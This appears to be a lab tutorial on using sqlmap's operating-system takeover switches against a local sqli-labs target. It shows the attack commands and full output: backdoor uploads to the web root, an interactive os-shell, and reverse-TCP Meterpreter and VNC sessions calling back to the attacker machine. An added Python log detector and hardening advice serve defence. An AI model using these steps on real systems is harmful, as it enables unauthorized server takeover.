Operating System takeover with SQLMap

Several SQLMap switches allow us to execute system commands on the operating system underlying the database server.

The SQLMap advanced help menu (sqlmap -hh) lists several switches under the Operating System Access section that are specifically intended for taking over the operating system.

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory


In this chapter, we will discuss the first three switches used to take over the operating system, listed below:

  •     --os-cmd=OSCMD      Execute an operating system command
  •     --os-shell          Prompt for an interactive operating system shell
  •     --os-pwn            Prompt for an OOB shell, Meterpreter or VNC


OS-cmd

The --os-cmd switch executes commands on the target operating system by using the DBMS file-write (load file) functionality to upload a web stager into the web root.

Let us execute the “whoami” command against the URL used earlier, whose injectable GET parameter is id.

Use the below command, and supply a Windows command after the --os-cmd switch:

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-cmd=whoami

The “whoami” command displays the user, group, and privileges information for the user who is currently logged on to the local system.

On execution, it asks a few basic questions about the target system:

---
[11:51:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.39
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:51:29] [INFO] going to use a web backdoor for command execution
[11:51:29] [INFO] fingerprinting the back-end DBMS operating system
[11:51:29] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4              # As my Target system web server supports PHP 
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[11:51:33] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1           # Writable Directory is the location where the web server contents are located.

Once these are answered, SQLMap tries to upload its stager and backdoor, then returns the output of the given command.

[11:51:42] [WARNING] unable to automatically parse any web server path
[11:51:42] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[11:51:43] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://192.168.56.108:80/tmpuvtbe.php
[11:51:43] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://192.168.56.108:80/tmpbgjhl.php

Here is the output of the successful execution of the command:

do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'oprekin-pc\windows-pc'

The "command standard output" line carries the result of the command. After each operation, the uploaded web files are automatically removed.

[11:51:46] [INFO] cleaning up the web files uploaded
[11:51:47] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times

In the same way, you can run any Windows shell command and retrieve its output.


OS-Shell

If the --os-cmd switch looks cumbersome, do not worry: SQLMap provides the --os-shell switch, which can be used to interact with the Windows shell directly.

Fire up the terminal and type the following command:

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-shell

Similar to the previous switch, it prompts for the same basic platform details, which we answer as before.

---
[12:28:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.39
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:28:47] [INFO] going to use a web backdoor for command execution
[12:28:47] [INFO] fingerprinting the back-end DBMS operating system
[12:28:47] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4              # As my Target system web server supports PHP 
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[12:28:53] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2          # Writable Directory is the location where the web server contents are located.

Now we have to provide a comma-separated list of absolute directory paths:

please provide a comma separate list of absolute directory paths: c:/xampp/htdocs/
[12:29:09] [WARNING] unable to automatically parse any web server path
[12:29:09] [INFO] trying to upload the file stager on 'c:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method

Once these are done, SQLMap tries to upload its stager and backdoor and returns with an interactive shell on the web server.

[12:29:09] [INFO] the file stager has been successfully uploaded on 'c:/xampp/htdocs/' - http://192.168.56.108:80/tmpuelfr.php
[12:29:09] [INFO] the backdoor has been successfully uploaded on 'c:/xampp/htdocs/' - http://192.168.56.108:80/tmpbyfjq.php

This feature of SQLMap is quite magnificent and easily allows us to get a shell.

[12:29:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 

Now we are ready; let’s input Windows shell commands.

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'oprekin-pc\windows-pc'
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
Volume in drive C has no label.
 Volume Serial Number is 8E39-833B

 Directory of C:\xampp\htdocs

12/14/2022  09:29 AM    <DIR>          .
12/14/2022  09:29 AM    <DIR>          ..
02/27/2017  01:36 AM             3,607 applications.html
02/27/2017  01:36 AM               177 bitnami.css
12/06/2022  09:03 AM    <DIR>          dashboard
07/16/2015  07:32 AM            30,894 favicon.ico
12/06/2022  09:03 AM    <DIR>          img
07/16/2015  07:32 AM               260 index.php
12/13/2022  02:41 AM               326 shell.php
12/06/2022  09:10 AM    <DIR>          sqli-labs-master
12/13/2022  02:34 AM                15 test.html
12/14/2022  09:03 AM               866 tmpbakgn.php
12/14/2022  08:57 AM               866 tmpbbjnz.php
12/14/2022  09:24 AM               866 tmpbgvzv.php
12/14/2022  09:11 AM               866 tmpbskql.php
12/14/2022  09:00 AM               866 tmpbvmby.php
12/14/2022  09:29 AM               866 tmpbyfjq.php
12/14/2022  09:11 AM               721 tmpuanjm.php
12/14/2022  08:57 AM               721 tmpudofe.php
12/14/2022  09:29 AM               721 tmpuelfr.php
12/14/2022  09:24 AM               721 tmpujjvb.php
12/14/2022  09:03 AM               721 tmpupera.php
12/14/2022  09:00 AM               721 tmputnnt.php
12/06/2022  09:03 AM    <DIR>          webalizer
12/06/2022  09:03 AM    <DIR>          xampp
              18 File(s)         44,801 bytes
               7 Dir(s)  101,004,169,216 bytes free
---
os-shell>

The text above is the output of the “whoami” and “dir” commands executed via os-shell. Note that the directory listing also shows tmpu*.php (stager, 721 bytes) and tmpb*.php (backdoor, 866 bytes) files from earlier runs that morning. After each operation, the uploaded web files are automatically removed.

Type "q" to quit the session:

os-shell> q
[12:29:42] [INFO] cleaning up the web files uploaded
[12:29:42] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[12:29:42] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'
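As an added example (not part of the original post or of sqlmap itself), here is a small Python detector that parses Apache access-log lines for the artifacts the --os-cmd and --os-shell runs above leave in the logs: the stager (tmpu*.php) and backdoor (tmpb*.php) files sqlmap writes into the web root and then calls. The log lines are constructed to mirror the session above; the sqlmap User-Agent string and the byte sizes are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" access-log line (the format the XAMPP Apache in the walkthrough writes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
# sqlmap's stager/backdoor names as seen in the walkthrough (tmpuvtbe.php, tmpbyfjq.php):
# "tmp" + "u" (stager) or "b" (backdoor) + four random lowercase letters + the chosen web language.
ARTIFACT_RE = re.compile(r'/tmp(?P<kind>[ub])[a-z]{4}\.(?:php|asp|aspx|jsp)$')

def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_sqlmap_takeover(lines):
    """Return (findings, verdicts): findings are (ip, kind, path, status) tuples; verdicts
    map each client IP to 'takeover' (stager and backdoor both seen) or '<kind>-only'."""
    findings = []
    kinds_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec['path'].split('?', 1)[0]          # drop the query string (e.g. ?cmd=whoami)
        m = ARTIFACT_RE.search(path)
        if m:
            kind = 'stager' if m.group('kind') == 'u' else 'backdoor'
            kinds_by_ip[rec['ip']].add(kind)
            findings.append((rec['ip'], kind, path, int(rec['status'])))
        elif rec['ua'] and rec['ua'].lower().startswith('sqlmap/'):
            # Default sqlmap User-Agent (assumed format); trivially changed, so only a weak signal.
            findings.append((rec['ip'], 'sqlmap-ua', path, int(rec['status'])))
    verdicts = {}
    for ip, kinds in kinds_by_ip.items():
        verdicts[ip] = 'takeover' if kinds == {'stager', 'backdoor'} else next(iter(kinds)) + '-only'
    return findings, verdicts

# Constructed sample lines modelled on the walkthrough (attacker 192.168.56.101, web root C:/xampp/htdocs/).
SAMPLE_LOG = [
    '192.168.56.101 - - [14/Dec/2022:09:28:47 -0500] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 1409 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '192.168.56.101 - - [14/Dec/2022:09:29:09 -0500] "POST /tmpuelfr.php HTTP/1.1" 200 0 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '192.168.56.101 - - [14/Dec/2022:09:29:12 -0500] "GET /tmpbyfjq.php?cmd=whoami HTTP/1.1" 200 28 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '192.168.56.101 - - [14/Dec/2022:09:29:42 -0500] "GET /tmpuelfr.php HTTP/1.1" 404 196 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '192.168.56.110 - - [14/Dec/2022:09:30:01 -0500] "GET /index.php HTTP/1.1" 200 260 "-" "Mozilla/5.0"',
]
```

Pair this with a file-system check of the web root, since the dir listing above shows stager and backdoor files from earlier runs that the cleanup step left behind; the upload itself depends on the database user holding MySQL's FILE privilege, which secure_file_priv and a least-privilege application account deny.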

Let's proceed to the next switch.


OS-PWN

The --os-pwn switch of SQLMap allows the attacker to spawn an interactive command prompt, a Meterpreter session, or a graphical (VNC) session.

Its usage is quite simple; use the following command to spawn a session:

┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-pwn

Remember: the --os-pwn switch may not work properly as a normal user, so run it with sudo.

Similar to the previous switches, it prompts for the basic platform details, plus the tunnel type to use.

[12:31:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:31:04] [INFO] fingerprinting the back-end DBMS operating system
[12:31:04] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1                            # Use the Metasploit Framework
[12:31:18] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[12:31:28] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1

Once these are answered, SQLMap tries to upload its stager and backdoor to the web server. Finally, it prompts us to choose the connection type:

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1         # Reverse TCP is a good choice for establishing a connection
what is the local address? [Enter for '192.168.56.101' (detected)] # No need to change LHost, LPort
which local port number do you want to use? [46983] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>


Let’s start with Meterpreter

Type 1 to create a Meterpreter session. On execution, SQLMap uploads its shellcodeexec binary to the Windows \Temp directory.

which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[12:44:17] [INFO] creation in progress ................................ done
[12:44:49] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsefuvq.exe'
[12:44:49] [INFO] shellcodeexec successfully uploaded

It automatically generates the shellcode and uploads shellcodeexec to the temp directory. Once the upload succeeds, it launches msfconsole with the matching handler.

Now as you can notice, we have got a meterpreter session.

meterpreter > pwd
c:\xampp\htdocs
meterpreter > shell 
Process 1676 created.
Channel 1 created.
Microsoft Windows [Version 10.0.*******.***]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>


Let’s inject a VNC session

Type 3 to create a VNC session. On execution, SQLMap uploads shellcodeexec to the \Temp directory and launches msfconsole.

which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 3
[12:44:17] [INFO] creation in progress ................................ done
[12:44:49] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsefuvq.exe'
[12:44:49] [INFO] shellcodeexec successfully uploaded
[12:44:49] [INFO] running Metasploit Framework command line interface locally, please wait..
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]                                                
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]                                                
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]                                                
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]                                                
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                
                                                                                                                               

       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log

[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
EXITFUNC => process
LPORT => 18860
LHOST => 192.168.56.101
DisableCourtesyShell => true
[*] Started reverse TCP handler on 192.168.56.101:18860 
[12:45:22] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (401920 bytes) to 192.168.56.108
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.

In the end msfconsole automatically creates a VNC session.

As we can see, we have successfully obtained a VNC session via SQLMap.
